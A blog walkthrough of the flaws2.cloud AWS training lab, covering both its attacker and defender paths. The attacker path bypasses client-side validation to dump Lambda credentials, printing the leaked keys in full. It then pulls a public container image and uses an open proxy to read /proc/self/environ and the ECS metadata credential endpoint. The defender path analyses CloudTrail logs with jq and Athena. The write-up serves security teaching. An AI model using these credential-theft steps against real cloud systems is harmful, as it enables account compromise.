Flaws2.cloud WalkThrough-AWS Cloud Security

KISHORERAM
20 min readJan 25, 2024

--

Introduction

Welcome to our exploration of the cloud! We’re looking at flaws.cloud, a fun and useful tool for AWS users. It’s great for beginners and experts alike. The hints make it a practical learning experience. But it’s not just for newbies. Even pros can find it challenging to complete without any hints.

After the success of flaws.cloud, we now have flaws2.cloud. This new version focuses on serverless technologies. You can choose to play as a Red team member or a Blue team member. Let’s dive in and learn more about these exciting platforms

Flaws 2 has two paths this time: Attacker and Defender! In the Attacker path, you’ll exploit your way through misconfigurations in serverless (Lambda) and containers (ECS Fargate). In the Defender path, that target is now viewed as the victim and you’ll work as an incident responder for that same app, understanding how an attack happened. You’ll get access to logs of a previous successful attack. As a Defender you’ll learn the power of jq in analyzing logs, and instructions on how to set up Athena in your own environment.

Attacker

In this path as an attacker, you’ll exploit your way through misconfigurations in Lambda (serverless functions) and containers in ECS Fargate.

Level 1

For this level, you’ll need to enter the correct PIN code. The correct PIN is 100 digits long, so brute forcing it won’t help.

I tried to input the random code, it gave me Incorrect ,Try again.

I tried to input some characters , it gave an alert box that Code must be a number. It was interesting so i tried looking into the source code

<script type="text/javascript">
function validateForm() {
var code = document.forms["myForm"]["code"].value;
if (!(!isNaN(parseFloat(code)) && isFinite(code))) {
alert("Code must be a number");
return false;
}
}

There is basic validation javascript in the source code .Level 1 — Hint 1 The input validation is only done by the javascript. Get around it and pass a pin code that isn’t a number. So assuming we can just pass a parameter called ‘a’ in the form and try to capture the request in burpsuite to see the response. Also i noticed if it is incorrect then perform particular action https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1 I visited this URL and it gave me internal server error.

Now lets look the captured request for non numeric data in the form in Burp-suite so that we can try accessing how to access this server.

As I guessed the result is an error based on the malformed input, an error that gives us a ton of data we should not have access to.

AWS_SESSION_TOKEN:IQoJb3JpZ2luX2VjEHAaCXVzLWVhc3QtMSJGMEQCIHgsXLZBVf2LFTTEuIajSmFDazfTgwBFtzgTGvMOgRYxAiAb27TuikmI+un2tBCO5o6ALcsCTVYnn0N/lMJ/PExXAyrgAggpEAMaDDY1MzcxMTMzMTc4OCIMbE0ZbEc9kTPAPQaAKr0CsyR9+OtqumvVZIkc5mBE/i/WuVUDwzcn19JsEPjZ6DpWhOy4ZOjkNbmBeyIeGlWNw4UCm4Gd7RIGRUcL9ZllDelz9AGfEpP4bMcfptJyo0Rvzcd51FtRY0DKOovYs99zL/wV5amwDGyWHG6m9ST6SozWdlbf35OIUQyYCPsdz5vd631MRqtaBSfus4VRBmpny8oaANQnOqb2eTWUMqGw+bxp2TT+SXiyoxP5fMfXa28Yzl6zQHX1ivCYnrW9F0yRnLWqNFdYeTJbN41rOIvQELAEqIf6LSONx5AFeFMTD5L4Hf05EgZ4NbeC8EyNG/G+SNv/h87IACeqlQmnW6fhetnKQXrAh/u7xWkXVKX5GbGcu4m1Rrc8C1LC9N5CIcMXubAvf32UIyqPtQg5wS5UySUAxUXxcqICOaxW6Z4wmpezrQY6nwHQz+qXvvrBNs7f4QD67FB/HSJibBMazEdatgzYOvTnG0GXyDmfp1t1Q235UpE5D6ffXikMtaA7mlcexTGXLsbwmYAhQzUPeuLQjcEL9/d/AedbKtOqGJXfnERL4fk6fZjZIfKaUh7hS84O+yd8G6rX0jaNaCzA63ogfpdY1qWI2JA5zjmKRjqVJHmWhXWWEA9wrf4vDo3ZR9RHZNrShiQ=
AWS_ACCESS_KEY_ID:ASIAZQNB3KHGL7QJFTUW
AWS_SECRET_ACCESS_KEY:Vb8mkvzVQU7fxTXlCX3h27mbNnhc7i+byt3TAxCq
AWS_REGION:us-east-1
AWS_XRAY_DAEMON_ADDRESS:169.254.79.129
AWS_XRAY_DAEMON_ADDRESS:169.254.79.129:2000

And the full error response for reference and Let’s copy this data and use an online JSON formatter to make it look more appealing.

{
"_AWS_XRAY_DAEMON_ADDRESS": "169.254.79.129",
"LD_LIBRARY_PATH": "/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib",
"AWS_XRAY_DAEMON_ADDRESS": "169.254.79.129:2000",
"AWS_SESSION_TOKEN": "IQoJb3JpZ2luX2VjEHAaCXVzLWVhc3QtMSJGMEQCIHgsXLZBVf2LFTTEuIajSmFDazfTgwBFtzgTGvMOgRYxAiAb27TuikmI+un2tBCO5o6ALcsCTVYnn0N/lMJ/PExXAyrgAggpEAMaDDY1MzcxMTMzMTc4OCIMbE0ZbEc9kTPAPQaAKr0CsyR9+OtqumvVZIkc5mBE/i/WuVUDwzcn19JsEPjZ6DpWhOy4ZOjkNbmBeyIeGlWNw4UCm4Gd7RIGRUcL9ZllDelz9AGfEpP4bMcfptJyo0Rvzcd51FtRY0DKOovYs99zL/wV5amwDGyWHG6m9ST6SozWdlbf35OIUQyYCPsdz5vd631MRqtaBSfus4VRBmpny8oaANQnOqb2eTWUMqGw+bxp2TT+SXiyoxP5fMfXa28Yzl6zQHX1ivCYnrW9F0yRnLWqNFdYeTJbN41rOIvQELAEqIf6LSONx5AFeFMTD5L4Hf05EgZ4NbeC8EyNG/G+SNv/h87IACeqlQmnW6fhetnKQXrAh/u7xWkXVKX5GbGcu4m1Rrc8C1LC9N5CIcMXubAvf32UIyqPtQg5wS5UySUAxUXxcqICOaxW6Z4wmpezrQY6nwHQz+qXvvrBNs7f4QD67FB/HSJibBMazEdatgzYOvTnG0GXyDmfp1t1Q235UpE5D6ffXikMtaA7mlcexTGXLsbwmYAhQzUPeuLQjcEL9/d/AedbKtOqGJXfnERL4fk6fZjZIfKaUh7hS84O+yd8G6rX0jaNaCzA63ogfpdY1qWI2JA5zjmKRjqVJHmWhXWWEA9wrf4vDo3ZR9RHZNrShiQ=",
"AWS_LAMBDA_LOG_GROUP_NAME": "/aws/lambda/level1",
"AWS_LAMBDA_FUNCTION_NAME": "level1",
"AWS_LAMBDA_FUNCTION_VERSION": "$LATEST",
"AWS_XRAY_CONTEXT_MISSING": "LOG_ERROR",
"AWS_LAMBDA_INITIALIZATION_TYPE": "on-demand",
"AWS_REGION": "us-east-1",
"AWS_SECRET_ACCESS_KEY": "Vb8mkvzVQU7fxTXlCX3h27mbNnhc7i+byt3TAxCq",
"LAMBDA_TASK_ROOT": "/var/task",
"LAMBDA_RUNTIME_DIR": "/var/runtime",
"AWS_ACCESS_KEY_ID": "ASIAZQNB3KHGL7QJFTUW",
"LANG": "en_US.UTF-8",
"AWS_DEFAULT_REGION": "us-east-1",
"AWS_LAMBDA_RUNTIME_API": "127.0.0.1:9001",
"AWS_LAMBDA_FUNCTION_MEMORY_SIZE": "128",
"_HANDLER": "index.handler",
"AWS_EXECUTION_ENV": "AWS_Lambda_nodejs8.10",
"PATH": "/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin",
"_AWS_XRAY_DAEMON_PORT": "2000",
"AWS_LAMBDA_LOG_STREAM_NAME": "2024/01/21/[$LATEST]ec39de8eca41495a8158dcf0cff5c7ab",
"TZ": ":UTC",
"NODE_PATH": "/opt/nodejs/node8/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task:/var/runtime/node_modules",
"_X_AMZN_TRACE_ID": "Root=1-65acccb2-198751986691bca97d3eb148;Parent=6b11cc056d9bb12a;Sampled=0;Lineage=e547cb94:0"
}

As observed from the above data we now have access to some variables which just happen to be AWS credentials. With these credentials, I can create an aws profile to get access to the underlying AWS infrastructure.

Add the AWS session token to the ~/.aws/credentials file

To discover the account ID. we can give aws --profile flaws2 sts get-caller-identity

I got an error,
An error occurred (InvalidClientTokenId) when calling the GetCallerIdentity operation: The security token included in the request is invalid.

By googling i got answer in stack overflow https://stackoverflow.com/questions/34582318/how-can-i-resolve-the-error-the-security-token-included-in-the-request-is-inval

If you have been given a Session Token also, then you need to manually set it after configure:

aws configure set aws_session_token "<<your session token>>"

It resolved for me.

These credentials can now be used to list the contents of the bucket.

Now we need to visit secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html
we visit http://level1.flaws2.cloud/secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html

Lesson learned

Whereas EC2 instances obtain the credentials for their IAM roles from the metadata service at 169.254.169.254 (as you learned in flaws.cloud Level 5), AWS Lambda obtains those credentials from environmental variables. Often developers will dump environmental variables when error conditions occur in order to help them debug problems. This is dangerous as sensitive information can sometimes be found in environmental variables.

Another problem is the IAM role had privilieges to list the contents of a bucket which wasn’t needed for its operation. Best practice is to follow a Least Privilege strategy by giving services only the minimal privileges in their IAM policies that they need to accomplish their purpose. AWS CloudTrail logs can help identify past usage (leveraged by Duo Security’s CloudTracker) or AWS Access Advisor (leveraged by Netflix’s RepoKid).

Finally, you shouldn’t rely on input validation to happen only on the client side or at some point upstream from your code. AWS applications, especially serverless, are composed of many building blocks all chained together. Developers sometimes assume that something upstream has already performed input validation. In this case, the client data was validated by Javascript which could be bypasseed, which then passed into API Gateway and finally to the Lambda. Applications are often more complex than that, and these architectures can change over time, possibly breaking assumptions about where validation is supposed to occur.

Level 2 -Containers Environmental Variables

This next level is running as a container at http://container.target.flaws2.cloud/. Just like S3 buckets, other resources on AWS can have open permissions. I’ll give you a hint that the ECR (Elastic Container Registry) is named “level2”.

Amazon Elastic Container Registry (ECR) is a product from Amazon Web Services (AWS) that stores, manages, and deploys Docker images.
ECR is a container image repository that stores images of containers like Docker images. It uses Amazon Simple Storage Service (S3) for storage to make container images highly available and accessible. ECR is integrated with Amazon Elastic Container Service (ECS), which simplifies the development to production workflow. AWS Fargate is a technology that you can use with Amazon ECS to run containers without having to manage servers or clusters of Amazon EC2 instances. With Fargate, you no longer have to provision, configure, or scale clusters of virtual machines to run containers. With Fargate, you can run containers on demand, without worrying about capacity planning, scaling, or patching. Finally, ECR (Elastic Container Registry) is a fully-managed Docker container registry that makes it easy to store, manage, and deploy Docker images.

In this level we will list all images in the registry since ECR is public and we can use either docker or AWS CLI to inspect the contents in the image. Docker images are composed of layers, which are intermediate build stages of the image. Each line in a Dockerfile results in the creation of a new layer.

Enumerating ECR we found the list of images available in the repository named level2 with the registry ID found in the previous level using
get-caller-identity

Now that you know the image is public, you have two choices, you can either download it locally with docker pull and investigate it with Docker commands or do things more manually with the AWS CLI.

Option 1: Using the docker commands

Source: https://dockerlabs.collabnix.com/

pull the image from the repository and we can verify it has been pulled by checking the list of images present in our local repository.

The docker inspect command is used to get detailed information about Docker objects. These objects can be docker images, containers, networks, volumes, and so on.

The docker inspect command provides a lot of information about the specified object. For example, if you inspect an image, you will get information about its configuration, layers, and other metadata.To get the list of all the layers for an image: You can use the docker inspect command to get the list of all the layers for an image. This can be useful for troubleshooting purposes or for understanding how an image was built. Each line in a Dockerfile results in the creation of a new layer.

Docker image history command can be used to show the history of the specified image.

we can get the command needed to login to the container at http://container.target.flaws2.cloud/

The “docker run” command is used to create and run a container based on a specified Docker image. It allows users to instantiate isolated and portable environments, encapsulating an application and its dependencies. The “run” command supports various options and arguments, enabling users to configure aspects such as port mappings, volume mounts, environment variables, and more. sudo docker run -ti -p8000:8000 653711331788.dkr.ecr.us-east-1.amazonaws.com/leve12 bash the command uses elevated privileges (“sudo”) to execute Docker, creates a container based on the specified image, allocates a pseudo-TTY for interactive access (“-ti”), maps port 8000 from the host to the container, and starts a Bash shell within the container.

we can find the link for the next level in the /var/www/html/index.htm

Option 2: Using the AWS CLI

You can also analyse the images using aws cli by using jq command line utility. jq is a command-line JSON parser and processor that can be used with AWS CLI. It can be used to slice and filter JSON data.

jq is a lightweight and flexible command-line JSON processor. It is used to slice, filter, map, and transform structured data. It is written in portable C and has zero runtime dependencies. In the given AWS ECR command, “aws ecr batch-get-image” is used to retrieve details about container images from an ECR repository. The specific repository is named “level2,” belonging to the registry with the ID “653711331788.” The “ — image-ids” flag specifies the image to retrieve, using the “latest” tag. The output is then piped into “jq,” where ‘.images[].imageManifest | fromjson’ is applied. This “jq” filter extracts the “imageManifest” field from each image in the output and converts it from a JSON string to a JSON object. Essentially, this command retrieves information about the latest image in the “level2” repository, and “jq” is used to process and format the output by converting the image manifests into a more readable JSON format.

Each layer in a container image represents a set of file system changes, and the layerDigest is a cryptographic hash, often using the SHA-256 algorithm, that uniquely identifies the content and structure of that layer. The layerDigest is crucial for ensuring the integrity of container images. When you pull an image, the container runtime uses the layerDigest to verify the content of each layer. If any part of a layer is altered, the layerDigest would change, indicating that the image has been tampered with or corrupted.

Level 3

Lesson learned

There are lots of other resources on AWS that can be public, but they are harder to brute-force for because you have to include not only the name of the resource, but also the the Account ID and region. They also can’t be searched with DNS records. However, it is still best to avoid having public resources.

Level 3 challenge

The container’s webserver you got access to includes a simple proxy that can be access with: http://container.target.flaws2.cloud/proxy/http://flaws.cloud or http://container.target.flaws2.cloud/proxy/http://neverssl.com

Containers running via ECS on AWS have their creds at 169.254.170.2/v2/credentials/GUID where the GUID is found from an environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
On Linux systems, the environmental variables for a process can often be found by looking in /proc/self/environ.Use http://container.target.flaws2.cloud/proxy/file:///proc/self/environ and use the GUID found there to access something like http://container.target.flaws2.cloud/proxy/http://169.254.170.2/v2/credentials/468f6417-4361-4690-894e-3d03a0394609 Use those creds to run aws s3 ls to list the buckets in the account.

Defender Track

Welcome Defender! As an incident responder we’re granting you access to the AWS account called “Security” as an IAM user. This account contains a copy of the logs during the time period of the incident and has the ability to assume into the “Security” role in the target account so you can look around to spot the misconfigurations that allowed for this attack to happen.
The Defender track won’t include challenges like the Attacker track, and instead will walk you through key skills for doing security work on AWS. The objectives are:

  • Objective 1: Download CloudTrail logs
  • Objective 2: Access the Target account
  • Objective 3: Use jq
  • Objective 4: Identify credential theft
  • Objective 5: Identify the public resource
  • Objective 6: Use Athena

Credentials

Your IAM credentials to the Security account:

Environment

The credentials above give you access to the Security account, which can assume the role “security” in the Target account. You also have access to an S3 bucket, named flaws2_logs, in the Security account that, that contains the CloudTrail logs recorded during a successful compromise from the Attacker track.

Objective 1: Download CloudTrail logs

Step 1: Setup CLI

The first thing we’ll do is download the CloudTrail logs. Do this by configuring the AWS CLI or try using aws-vault as it avoids storing the keys in plain-text in your home directory like the AWS CLI does, so it helps avoid a common source of key leakage.

Ensure this worked by running:

As mentioned earlier we can see the list of buckets we have access to and download everything in the bucket using s3 sync for further analysing.

Step 2: Download the logs

Now let’s download the CloudTrail logs with:

The CloudTrail logs are in the subfolder AWSLogs/653711331788/CloudTrail/us-east-1/2018/11/28/
and got lot of .json.gz files within the directory path AWSLogs/653711331788/CloudTrail/us-east-1/2018/11/28/

Objective 2: Access the Target account

A common, and best practice, AWS setup is to have a separate Security account that contains the CloudTrail logs from all other AWS accounts and also has some sort of access into the other accounts to check up on things. For this objective, we need to access the Target account through the IAM role that grants the Security account access. In your ~/.aws/config file, you should already have a profile for your security account that looks like:

[profile security]
region=us-east-1
output=json

Now, we'll add a profile for the target to that file:

[profile target_security]
region=us-east-1
output=json
source_profile = security
role_arn = arn:aws:iam::653711331788:role/security

You should now be able to run:

aws --profile target_security sts get-caller-identity

You should get results like this:

{
"Account": "653711331788",
"UserId": "AROAIKRY5GULQLYOGRMNS:botocore-session-1544126021",
"Arn": "arn:aws:sts::653711331788:assumed-role/security/botocore-session-1544126021"
}

The important thing to notice is when your account ID is 322079859186, you are running in the security account, and when it is 653711331788, you are running in the context of the target account.

Run aws --profile target_security s3 ls and you'll see the S3 buckets for the levels of the Attacker path.

Objective 3: Use jq

Let’s start digging into the log data we have. If you don’t already have jq installed, you should install it. https://stedolan.github.io/jq/download/.

All the logs are in AWSLogs/653711331788/CloudTrail/us-east-1/2018/11/28/, but often you will have CloudTrail logs in lots of subdirectories, so it’s helpful to be able to act on them all at once. Assuming your current working directory is inside a folder where you downloaded these files, and you don’t have anything else there, gunzip the files by running the following, which will find all the files in every subdirectory, recursively, and attempt to gunzip them.:

find . -type f -exec gunzip {} \;

Now cat them through jq with:

find . -type f -iname "*.json" -exec cat {} \; | jq '.'

You should see nicely formatting json data, but it’s a lot of info, so let’s just see the event names.To see just the event names print the eventName field nested under Records Replace the jq query in the command above to:

jq '.Records[]|.eventName'

You should see:

...
"GetObject"
"GetObject"
"ListBuckets"
"AssumeRole"
"AssumeRole"
"BatchGetImage"
"GetDownloadUrlForLayer"
"CreateLogStream"
"CreateLogStream"

These are slightly out of order, so let’s include the time. Replace the jq part with:

find . -type f -iname "*.json" -exec cat {} \; | jq -cr '.Records[]|[.eventTime, .eventName] |@tsv' | sort

You should see:

...
2018-11-28T22:31:59Z AssumeRole
2018-11-28T22:31:59Z AssumeRole
2018-11-28T23:02:56Z GetObject
2018-11-28T23:02:56Z GetObject
2018-11-28T23:02:56Z GetObject
2018-11-28T23:02:56Z GetObject
2018-11-28T23:02:57Z GetObject
2018-11-28T23:03:08Z GetObject
2018-11-28T23:03:08Z GetObject
2018-11-28T23:03:08Z GetObject
2018-11-28T23:03:08Z GetObject
2018-11-28T23:03:08Z GetObject
2018-11-28T23:03:11Z GetObject
2018-11-28T23:03:11Z GetObject
2018-11-28T23:03:12Z AssumeRole
2018-11-28T23:03:12Z CreateLogStream

The -cr prints the data in a row, and the |@tsv makes this tab separated. Then it gets sorted by the time since that’s the first colunm.

Extending that even further, we can replace the jq part with:

find . -type f -iname "*.json" -exec cat {} \; 
| jq -cr '.Records[]|[.eventTime, .sourceIPAddress, .userAgent, .userIdentity.arn, .userIdentity.accountId, .userIdentity.type, .eventName]|@tsv'
| sort > events.tsv

You can then copy that into Excel or another spreadsheet which can sometimes make the data easier to work with.

These logs mostly contain the attack, but you’ll notice also logs for “AWSService” events as the Lambda and ECS resources obtained their roles. These are logs basically about how AWS works, and not any actions anyone did. There are also a lot of ANONYMOUS_PRINCIPAL, which are calls that did not involve an AWS principal. In this case, these are S3 requests from a web browser. If you look at the user-agent data (.userAgent) you’ll see them as Chrome, as opposed to the AWS CLI.

Objective 4: Identify credential theft

Let’s work our way backward through the hack by first focusing in on the ListBuckets call which can be found by using the jq query:

find . -type f -iname "*.json" -exec cat {} \; | jq '.Records[]|select(.eventName=="ListBuckets")'

The response is:

{
"eventVersion": "1.05",
"userIdentity": {
"type": "AssumedRole",
"principalId": "AROAJQMBDNUMIKLZKMF64:d190d14a-2404-45d6-9113-4eda22d7f2c7",
"arn": "arn:aws:sts::653711331788:assumed-role/level3/d190d14a-2404-45d6-9113-4eda22d7f2c7",
"accountId": "653711331788",
"accessKeyId": "ASIAZQNB3KHGNXWXBSJS",
"sessionContext": {
"attributes": {
"mfaAuthenticated": "false",
"creationDate": "2018-11-28T22:31:59Z"
},
"sessionIssuer": {
"type": "Role",
"principalId": "AROAJQMBDNUMIKLZKMF64",
"arn": "arn:aws:iam::653711331788:role/level3",
"accountId": "653711331788",
"userName": "level3"
}
}
},
"eventTime": "2018-11-28T23:09:28Z",
"eventSource": "s3.amazonaws.com",
"eventName": "ListBuckets",
"awsRegion": "us-east-1",
"sourceIPAddress": "104.102.221.250",
"userAgent": "[aws-cli/1.16.19 Python/2.7.10 Darwin/17.7.0 botocore/1.12.9]",
"requestParameters": null,
"responseElements": null,
"requestID": "4698593B9338B27F",
"eventID": "65e111a0-83ae-4ba8-9673-16291a804873",
"eventType": "AwsApiCall",
"recipientAccountId": "653711331788"
}

You’ll notice the IP here is 104.102.221.250 which is not an Amazon owned IP. In this case it’s the IP of nsa.gov. :) The only data I doctored in the logs was just to hide my home IP. We’ll view this IP as the attacker’s IP.

This call came from the role level3, so let’s look at that:

aws --profile target_security iam get-role --role-name level3

Response:

{
"Role": {
"Path": "/",
"RoleName": "level3",
"RoleId": "AROAJQMBDNUMIKLZKMF64",
"Arn": "arn:aws:iam::653711331788:role/level3",
"CreateDate": "2018-11-23T17:55:27+00:00",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"Service": "ecs-tasks.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Allows ECS tasks to call AWS services on your behalf.",
"MaxSessionDuration": 3600,
"RoleLastUsed": {
"LastUsedDate": "2024-01-06T05:48:54+00:00",
"Region": "us-east-2"
}
}
}

You’ll see this role is only supposed to be run by the ECS service, as the AssumeRolePolicyDocument is only allowing that Principal, but we just saw this IP clearly did not come from the AWS IP space (list of AWS IPs is here).

We don’t have logs from the webserver that is running the ECS container, but we can assume from this one log event that it must have been hacked. Normally, you’d see the resource (the ECS in this case) having made AWS API calls from it’s own IP that you could then compare against any new IPs it may have made.

Objective 5: Identify the public resource

Looking at earlier events from the CloudTrail logs, we’ll see level1 calling ListImages, BatchGetImage, and GetDownloadUrlForLayer. Again, this is a compromised session credential, but we also want to see what happened here.

ListImages

find . -type f -iname "*.json" -exec cat {} \; | jq '.Records[]|select(.eventName=="ListImages")'"requestParameters": {
"repositoryName": "level2",
"registryId": "653711331788"
}
{
"eventVersion": "1.04",
"userIdentity": {
"type": "AssumedRole",
"principalId": "AROAIBATWWYQXZTTALNCE:level1",
"arn": "arn:aws:sts::653711331788:assumed-role/level1/level1",
"accountId": "653711331788",
"accessKeyId": "ASIAZQNB3KHGIGYQXVVG",
"sessionContext": {
"attributes": {
"mfaAuthenticated": "false",
"creationDate": "2018-11-28T23:03:12Z"
},
"sessionIssuer": {
"type": "Role",
"principalId": "AROAIBATWWYQXZTTALNCE",
"arn": "arn:aws:iam::653711331788:role/service-role/level1",
"accountId": "653711331788",
"userName": "level1"
}
}
},
"eventTime": "2018-11-28T23:05:53Z",
"eventSource": "ecr.amazonaws.com",
"eventName": "ListImages",
"awsRegion": "us-east-1",
"sourceIPAddress": "104.102.221.250",
"userAgent": "aws-cli/1.16.19 Python/2.7.10 Darwin/17.7.0 botocore/1.12.9",
"requestParameters": {
"repositoryName": "level2",
"registryId": "653711331788"
},
"responseElements": null,
"requestID": "2780d808-f362-11e8-b13e-dbd4ed9d7936",
"eventID": "eb0fa4a0-580f-4270-bd37-7e45dfb217aa",
"resources": [
{
"ARN": "arn:aws:ecr:us-east-1:653711331788:repository/level2",
"accountId": "653711331788"
}
],
"eventType": "AwsApiCall",
"recipientAccountId": "653711331788"
}

BatchGetImage

find . -type f -exec cat {} \; | jq '.Records[]|select(.eventName=="BatchGetImage")'
{
"eventVersion": "1.04",
"userIdentity": {
"type": "AssumedRole",
"principalId": "AROAIBATWWYQXZTTALNCE:level1",
"arn": "arn:aws:sts::653711331788:assumed-role/level1/level1",
"accountId": "653711331788",
"accessKeyId": "ASIAZQNB3KHGIGYQXVVG",
"sessionContext": {
"attributes": {
"mfaAuthenticated": "false",
"creationDate": "2018-11-28T23:03:12Z"
},
"sessionIssuer": {
"type": "Role",
"principalId": "AROAIBATWWYQXZTTALNCE",
"arn": "arn:aws:iam::653711331788:role/service-role/level1",
"accountId": "653711331788",
"userName": "level1"
}
}
},
"eventTime": "2018-11-28T23:06:17Z",
"eventSource": "ecr.amazonaws.com",
"eventName": "BatchGetImage",
"awsRegion": "us-east-1",
"sourceIPAddress": "104.102.221.250",
"userAgent": "aws-cli/1.16.19 Python/2.7.10 Darwin/17.7.0 botocore/1.12.9",
"requestParameters": {
"imageIds": [
{
"imageTag": "latest"
}
],
"repositoryName": "level2",
"registryId": "653711331788"
},
"responseElements": null,
"requestID": "35ea9256-f362-11e8-86cf-35c48074ab0a",
"eventID": "b2867f3e-810c-47d1-9657-edb886e03fe6",
"resources": [
{
"ARN": "arn:aws:ecr:us-east-1:653711331788:repository/level2",
"accountId": "653711331788"
}
],
"eventType": "AwsApiCall",
"recipientAccountId": "653711331788"
}

GetDownloadUrlForLayer

{
"eventVersion": "1.04",
"userIdentity": {
"type": "AssumedRole",
"principalId": "AROAIBATWWYQXZTTALNCE:level1",
"arn": "arn:aws:sts::653711331788:assumed-role/level1/level1",
"accountId": "653711331788",
"accessKeyId": "ASIAZQNB3KHGIGYQXVVG",
"sessionContext": {
"attributes": {
"mfaAuthenticated": "false",
"creationDate": "2018-11-28T23:03:12Z"
},
"sessionIssuer": {
"type": "Role",
"principalId": "AROAIBATWWYQXZTTALNCE",
"arn": "arn:aws:iam::653711331788:role/service-role/level1",
"accountId": "653711331788",
"userName": "level1"
}
}
},
"eventTime": "2018-11-28T23:06:33Z",
"eventSource": "ecr.amazonaws.com",
"eventName": "GetDownloadUrlForLayer",
"awsRegion": "us-east-1",
"sourceIPAddress": "104.102.221.250",
"userAgent": "aws-cli/1.16.19 Python/2.7.10 Darwin/17.7.0 botocore/1.12.9",
"requestParameters": {
"layerDigest": "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621",
"repositoryName": "level2",
"registryId": "653711331788"
},
"responseElements": null,
"requestID": "3f96ec7f-f362-11e8-bf5d-3380094c69db",
"eventID": "ff4c72f3-4fbd-45d4-9ee3-3834a78f53de",
"resources": [
{
"ARN": "arn:aws:ecr:us-east-1:653711331788:repository/level2",
"accountId": "653711331788"
}
],
"eventType": "AwsApiCall",
"recipientAccountId": "653711331788"
}

We can check the policy by running:

aws --profile target_security ecr get-repository-policy --repository-name level2

Response:

{
"policyText": "{\n \"Version\" : \"2008-10-17\",\n \"Statement\" : [ {\n \"Sid\" : \"AccessControl\",\n \"Effect\" : \"Allow\",\n \"Principal\" : \"*\",\n \"Action\" : [ \"ecr:GetDownloadUrlForLayer\", \"ecr:BatchGetImage\", \"ecr:BatchCheckLayerAvailability\", \"ecr:ListImages\", \"ecr:DescribeImages\" ]\n } ]\n}",
"repositoryName": "level2",
"registryId": "653711331788"
}

You can clean that up by passing it through jq with jq ‘.policyText|fromjson’ which results in:

aws --profile target_security ecr get-repository-policy --repository-name level2 | jq '.policyText|fromjson'
{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "AccessControl",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr:GetDownloadUrlForLayer",
"ecr:BatchGetImage",
"ecr:BatchCheckLayerAvailability",
"ecr:ListImages",
"ecr:DescribeImages"
]
}
]
}

You can see the Principal is “*” which means these actions are public to the world to perform, which means this ECR is public. Ideally, you’d use a tool like CloudMapper to scan an account for public resources like this before you trace back an attack.

Objective 6: Use Athena

For this objective, we’ll be exploring the logs in a similar way as we did with jq, by using the AWS Service Athena. You’ll need to do this from your own account, as there isn’t a way I can give untrusted users access to Athena in my account without people doing undesirable things. Athena can be accessed at https://console.aws.amazon.com/athena/home?region=us-east-1#query. We’ll be working with such a small dataset that any charges on your account should be a few pennies. You’ll need Athena and Glue privileges.

In the query editor, run:

create database flaws2;

Switch to the flaws2 database you just created and run:

CREATE EXTERNAL TABLE `cloudtrail`(
`eventversion` string COMMENT 'from deserializer',
`useridentity` struct<type:string,principalid:string,arn:string,accountid:string,invokedby:string,accesskeyid:string,username:string,sessioncontext:struct<attributes:struct<mfaauthenticated:string,creationdate:string>,sessionissuer:struct<type:string,principalid:string,arn:string,accountid:string,username:string>>> COMMENT 'from deserializer',
`eventtime` string COMMENT 'from deserializer',
`eventsource` string COMMENT 'from deserializer',
`eventname` string COMMENT 'from deserializer',
`awsregion` string COMMENT 'from deserializer',
`sourceipaddress` string COMMENT 'from deserializer',
`useragent` string COMMENT 'from deserializer',
`errorcode` string COMMENT 'from deserializer',
`errormessage` string COMMENT 'from deserializer',
`requestparameters` string COMMENT 'from deserializer',
`responseelements` string COMMENT 'from deserializer',
`additionaleventdata` string COMMENT 'from deserializer',
`requestid` string COMMENT 'from deserializer',
`eventid` string COMMENT 'from deserializer',
`resources` array<struct<arn:string,accountid:string,type:string>> COMMENT 'from deserializer',
`eventtype` string COMMENT 'from deserializer',
`apiversion` string COMMENT 'from deserializer',
`readonly` string COMMENT 'from deserializer',
`recipientaccountid` string COMMENT 'from deserializer',
`serviceeventdetails` string COMMENT 'from deserializer',
`sharedeventid` string COMMENT 'from deserializer',
`vpcendpointid` string COMMENT 'from deserializer')
ROW FORMAT SERDE
'com.amazon.emr.hive.serde.CloudTrailSerde'
STORED AS INPUTFORMAT
'com.amazon.emr.cloudtrail.CloudTrailInputFormat'
OUTPUTFORMAT
'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'
LOCATION
's3://flaws2-logs/AWSLogs/653711331788/CloudTrail';

You can now run:

select eventtime, eventname from cloudtrail;

You can run all your normal SQL queries against this data now, for example:

SELECT 
eventname,
count(*) AS mycount
FROM cloudtrail
GROUP BY eventname
ORDER BY mycount;

Athena is great for incident response because you don’t have to wait for the data to load anywhere, just define the table in Athena and start querying it. If you do so, you should also create partitions which will reduce your costs by helping you query only against a specific day. AWS Glue and Amazon Athena are both services from Amazon that can be used for data analysis.

AWS Glue is a service that can discover, catalog, and transform data from different sources. It can also perform data integration and ETL workflows. AWS Glue crawlers are automated tools that can scan a data source to classify, group, and catalog the data. AWS Glue crawlers are automated tools that can scan a data source to classify, group, and catalog the data.

Amazon Athena is an interactive serverless service that can query and analyze raw data using standard SQL. It is optimized for quick and interactive query performance on large-scale datasets. AWS Glue integrates with Athena to enable more sophisticated data catalog features. For example, AWS Glue crawlers can automatically infer database and table schema from data in Amazon S3 and store the associated metadata in the AWS Glue Data Catalog. Athena uses the AWS Glue Data Catalog to store and retrieve table metadata for the Amazon S3 data.ETL workflows are a series of steps and tasks that define how data is extracted, transformed, and loaded.

The ETL process involves three steps:

  1. Extract: Collect relevant data from the source database
  2. Transform: Prepare the data for analytics
  3. Load: Transfer the data to the target database

The ETL process can also include cleaning and analyzing the data.

The complexity, volume, and frequency of the data determines the type of ETL workflow used. For example, updating a data warehouse every night may require hundreds of ETL processes.

Thanks For Reading :)

Don’t miss out on my upcoming articles! Follow me on Medium for more insightful content. Clap and share this article to spread the knowledge among fellow bug bounty hunters and cybersecurity enthusiasts.

